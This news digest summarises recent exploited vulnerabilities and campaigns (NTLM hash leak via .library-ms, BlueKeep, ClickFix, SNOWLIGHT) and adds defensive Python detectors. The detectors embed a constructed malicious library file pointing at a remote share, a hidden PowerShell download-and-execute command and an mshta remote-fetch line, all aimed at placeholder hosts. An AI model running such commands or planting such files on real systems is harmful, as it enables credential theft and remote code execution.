Three known exploited vulnerabilities added to catalog by CISA
CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog following confirmed evidence of active exploitation. One of them is CVE-2025-24054, an NTLM (New Technology LAN Manager) hash disclosure flaw in Windows: a malicious .library-ms file makes Windows authenticate to an attacker-controlled server and leak the user's NTLM hash, and the flaw is now being weaponized in phishing campaigns.
Microsoft patched the flaw in March 2025 and initially rated it "Exploitation Less Likely", yet researchers observed widespread exploitation within days, peaking between March 20 and 25. Attackers sent phishing emails with Dropbox links leading to ZIP archives; each archive contained a .library-ms file that triggered the flaw as soon as the victim extracted it. Windows then connected to the attacker's SMB server and attempted NTLM authentication, leaking the user's Net-NTLMv2 response, which can be cracked offline or relayed to other services. Later variants of the campaign dropped the archive entirely and sent the .library-ms file directly, lowering the bar for exploitation even further. Additional files in the attack package exploited older NTLM flaws, providing fallback methods for credential theft.
While IP addresses used in the attacks were linked to APT28, attribution remains inconclusive. Given the minimal user interaction required and the usefulness of a captured hash for relay attacks and lateral movement, it is a high-risk issue despite its medium severity rating (CVSS 6.5).
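A .library-ms file is plain XML in the Windows Library Description schema, so the lure can be recognised before anyone opens it: a legitimate library points at local known folders, while the ones described above point at a remote UNC share that Explorer will try to authenticate to. The scanner below is an added example written for this digest, not code from the campaign or from Check Point or CISA; the two sample files are constructed, and the host 203.0.113.5 is a documentation address rather than a real indicator.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Namespace of the Windows Library Description schema used by .library-ms files.
NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed samples, not files captured from the campaign. The remote host is
# an RFC 5737 documentation address, not a real indicator.
MALICIOUS_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\203.0.113.5\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

BENIGN_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# \\host\share, //host/share and the long form \\?\UNC\host\share
UNC_RE = re.compile(r"^(?:\\\\|//)(?:\?\\UNC\\)?([^\\/]+)")
# scheme://host/... (WebDAV-style locations); knownfolder:{...} has no "//"
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://([^/\\]+)", re.IGNORECASE)
REMOTE_SCHEMES = {"http", "https", "smb", "webdav", "ftp", "file"}


def library_urls(data):
    """Return every <simpleLocation><url> value in a .library-ms document."""
    if isinstance(data, str):
        data = data.encode("utf-8")   # let expat honour the declared encoding/BOM
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []
    urls = []
    for loc in root.iter(NS + "simpleLocation"):
        url = loc.find(NS + "url")
        if url is not None and url.text:
            urls.append(url.text.strip())
    return urls


def remote_locations(data):
    """Return (url, host) for each location that resolves to a remote host.

    Explorer contacts such a host as soon as the library is opened or browsed,
    which is the behaviour abused to capture NTLM authentication."""
    hits = []
    for url in library_urls(data):
        m = UNC_RE.match(url)
        if m:
            hits.append((url, m.group(1)))
            continue
        m = SCHEME_RE.match(url)
        if m and m.group(1).lower() in REMOTE_SCHEMES and m.group(2):
            hits.append((url, m.group(2)))
    return hits


def is_suspicious(data):
    return bool(remote_locations(data))


if __name__ == "__main__":
    # Scan files named on the command line; with no arguments, run the samples.
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                for url, host in remote_locations(fh.read()):
                    print(f"{path}: remote location {url} (host {host})")
    else:
        for label, sample in (("malicious", MALICIOUS_LIBRARY), ("benign", BENIGN_LIBRARY)):
            print(label, remote_locations(sample))
```

Run it against a mail-gateway quarantine or an extracted archive directory; any library file whose location is a UNC path or http(s) URL to a host outside the organisation deserves the same scrutiny as an .lnk or .url file, since the page's later campaign variants delivered the file on its own with no archive around it.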
North Korean Kimsuky group breaches South Korean and Japanese systems with BlueKeep vulnerability
A new malicious campaign by the North Korean state-sponsored group Kimsuky has been uncovered, targeting systems in South Korea and Japan.
The campaign, named Larva-24005 by researchers, exploits the BlueKeep vulnerability (CVE-2019-0708) in Microsoft Remote Desktop Services for initial access. An RDP vulnerability scanner was found on compromised systems, although its direct use in the intrusions was not confirmed. BlueKeep, a critical flaw with a CVSS score of 9.8, allows unauthenticated remote code execution and was patched by Microsoft in May 2019.
Kimsuky also uses phishing emails to deliver payloads exploiting the older Equation Editor vulnerability (CVE-2017-11882). Once inside, the attackers install a dropper that deploys the MySpy malware and RDPWrap, giving them persistent RDP access and a foothold for data gathering. They then deploy keyloggers such as KimaLogger and RandomQuery to capture keystrokes. The campaign has been ongoing since October 2023 and has primarily hit the software, energy and financial sectors in South Korea, with additional targets in several other countries.
ClickFix social engineering attacks waged by Interlock ransomware group
The Interlock ransomware gang has adopted ClickFix attacks, a social engineering technique that tricks users into running malicious PowerShell commands disguised as IT support actions.
These attacks often imitate trusted tools like Advanced IP Scanner, displaying fake CAPTCHA prompts and urging victims to "verify" themselves by copying a command and running it, typically from the Windows Run dialog. Once executed, the command downloads an installer that drops a legitimate copy of the impersonated application alongside a hidden PowerShell script. That script establishes persistence, gathers system data, and sends it to the attackers' command and control server. Payloads observed include LummaStealer, BerserkStealer, keyloggers and the Interlock RAT, a remote access trojan used for further exploitation.
After the initial breach, Interlock operators move laterally using stolen credentials and tools like RDP, PuTTY, AnyDesk and LogMeIn. Data is exfiltrated to Azure Blob storage before the ransomware is deployed, typically through a daily scheduled task used as a redundancy tactic. Researchers note that Interlock's ransom notes now emphasize legal and regulatory threats, and that the ClickFix method has also been linked to North Korean groups like Lazarus targeting crypto job seekers.
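Because the victim types the command themselves, the one reliable telemetry point is process creation: a script host spawned by explorer.exe (the Run dialog's parent) with a hidden window, a download cmdlet and an Invoke-Expression in its command line. The scorer below is an added example for this digest, not code from Sekoia or the Interlock tooling; the four events are constructed in the shape of Sysmon Event ID 1 fields, the weights and the threshold of 4 are my own choices, and example.invalid is a reserved name rather than a real C2 host.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in the shape of Sysmon Event ID 1 /
# Windows 4688 fields; none are taken from a real incident.
SAMPLE_EVENTS = [
    {   # user pasted a ClickFix command into the Run dialog (parent explorer.exe)
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify.txt -UseBasicParsing).Content"',
    },
    {   # admin opening an interactive shell from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -NoExit -Command "Get-Service | Where-Object Status -eq Running"',
    },
    {   # scheduled maintenance task: hidden window, but nothing fetched or evaluated
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\Scripts\backup.ps1",
    },
    {   # mshta variant of the same lure
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/captcha.hta",
    },
]

# (indicator name, weight, pattern matched against the command line). Weights
# are the example's own tuning, not a published rule.
INDICATORS = [
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+h(?:id|idden)?\b", re.I)),
    ("policy_bypass", 1, re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I)),
    ("remote_fetch", 2, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|wget|start-bitstransfer)\b", re.I)),
    ("invoke_expression", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("url", 1, re.compile(r"\bhttps?://", re.I)),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
THRESHOLD = 4


def _basename(path):
    return PureWindowsPath(path).name.lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    image = _basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return 0, []
    cmd = event.get("CommandLine", "")
    score, matched = 0, []
    for name, weight, pattern in INDICATORS:
        if pattern.search(cmd):
            score += weight
            matched.append(name)
    # The Run dialog and Start menu launch children under explorer.exe; a
    # script host started that way with download-and-eval flags is the lure.
    if _basename(event.get("ParentImage", "")) == "explorer.exe":
        score += 1
        matched.append("launched_from_explorer")
    # mshta pointed straight at a URL needs no other flags to be dangerous.
    if image == "mshta.exe" and "url" in matched:
        score += 3
        matched.append("mshta_remote")
    return score, matched


def find_clickfix(events, threshold=THRESHOLD):
    """Return the indexes of events whose score reaches the threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for i in find_clickfix(SAMPLE_EVENTS):
        score, matched = score_event(SAMPLE_EVENTS[i])
        print(f"event {i}: score {score}, indicators {matched}")
```

The scheduled-task event scores only on the hidden window and stays below the threshold, which is the point of weighting: hidden windows and execution-policy bypasses are common in legitimate automation, while a user-launched shell that fetches and evaluates remote content is not. Pair this with the HKCU\...\Explorer\RunMRU registry key, which records what was typed into the Run dialog, to recover the exact pasted command during triage.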
SNOWLIGHT malware and a new Chinese remote access trojan called VShell target Linux systems
China-linked threat actor UNC5174 has launched a new campaign targeting Linux systems using a modified version of the SNOWLIGHT malware and a new remote access trojan (RAT) called VShell.
This operation reflects a broader trend of attackers leveraging open-source tools for stealth and cost-efficiency, making attribution more difficult. Previously, UNC5174 exploited flaws in ConnectWise and F5 BIG-IP software to deploy SNOWLIGHT, which fetches additional tools like GOHEAVY and GOREVERSE from known C2 frameworks. In recent activity observed by researchers, SNOWLIGHT drops VShell via an in-memory, fileless payload, allowing attackers to remotely control infected systems. The attackers executed a malicious bash script to deploy SNOWLIGHT and Sliver binaries for persistence and communication with their command server.
French and Taiwanese cybersecurity agencies have linked similar techniques, including the exploitation of flaws in Ivanti appliances to breach global targets, to UNC5174 and possibly other China-nexus groups. The campaign spans nearly 20 countries. The disclosure also comes as China has accused the U.S. NSA of carrying out cyberattacks during the Asian Winter Games. Both SNOWLIGHT and VShell have variants capable of targeting macOS systems as well, further broadening the threat's scope.
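A payload that never touches disk still has to be executed from somewhere, and on Linux the usual route for a fileless loader is memfd_create() followed by fexecve(), which leaves the process's /proc/<pid>/exe link pointing at "/memfd:<name> (deleted)". The scanner below is an added example for this digest, not code from Sysdig or from SNOWLIGHT itself, and it assumes the memfd technique, which the page does not name; the fake /proc tree and the process name "worker" are constructed so the example runs without a live infection.

```python
import os
import tempfile


def find_memfd_processes(proc_root="/proc"):
    """List processes whose executable lives in an anonymous memfd.

    A binary started via memfd_create() + fexecve() has no file on disk; its
    /proc/<pid>/exe link reads "/memfd:<name> (deleted)". Scanning for that
    prefix surfaces the simplest class of fileless loaders."""
    hits = []
    for entry in sorted(os.listdir(proc_root), key=lambda e: (len(e), e)):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:           # kernel thread, already exited, or not readable
            continue
        if not exe.startswith("/memfd:"):
            continue
        try:
            with open(os.path.join(pid_dir, "cmdline"), "rb") as fh:
                argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
        except OSError:
            argv = []
        hits.append({"pid": int(entry), "exe": exe, "argv": argv})
    return hits


def build_fake_proc():
    """Create a constructed /proc look-alike containing one memfd-backed process.

    Everything here is invented for the example; "worker" is not an indicator."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    processes = (
        (1, "/usr/lib/systemd/systemd", ["/sbin/init"]),
        (4242, "/memfd:worker (deleted)", ["/memfd:worker", "--daemon"]),
        (4243, "/usr/bin/bash", ["bash"]),
    )
    for pid, exe, argv in processes:
        d = os.path.join(root, str(pid))
        os.mkdir(d)
        os.symlink(exe, os.path.join(d, "exe"))
        with open(os.path.join(d, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
    os.mkdir(os.path.join(root, "2"))      # kernel-thread style entry: no exe link
    os.mkdir(os.path.join(root, "sys"))    # non-PID entry, must be skipped
    return root


if __name__ == "__main__":
    root = "/proc" if os.path.isdir("/proc/self") else build_fake_proc()
    for hit in find_memfd_processes(root):
        print(f"pid {hit['pid']}: exe={hit['exe']} argv={hit['argv']}")
```

Run as root on a suspect host so every exe link is readable. This catches only the plain case; a loader can also map its payload into an already-running process or re-exec through /proc/self/fd, so pair the check with a look at /proc/<pid>/maps for memfd-backed mappings and with outbound connections from processes that have no on-disk binary.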
Japan’s Financial Services Agency reports over 1,450 unauthorized stock trades via stolen credentials
In Japan, a growing wave of cyber fraud has shaken the financial sector, as the Financial Services Agency (FSA) reports over 1,450 unauthorized stock transactions across six major securities firms. Between February 1 and April 16, attackers used stolen login credentials — harvested through phishing sites mimicking real brokerage portals — to access trading accounts and move over ¥95 billion in unauthorized trades.
Typically, attackers sell victims' holdings and reinvest the funds into Chinese stocks, possibly to manipulate prices and increase profits. While no direct money withdrawals have been confirmed, the sheer volume of trades highlights the scale of the breach. The FSA is urging customers to avoid clicking suspicious links, use strong, unique passwords, and enable multifactor authentication. Victims are advised to monitor accounts closely and report any anomalies immediately.
As investigations continue, the FSA emphasizes the importance of user vigilance and points to guidelines from the Japan Securities Dealers Association for safer online trading.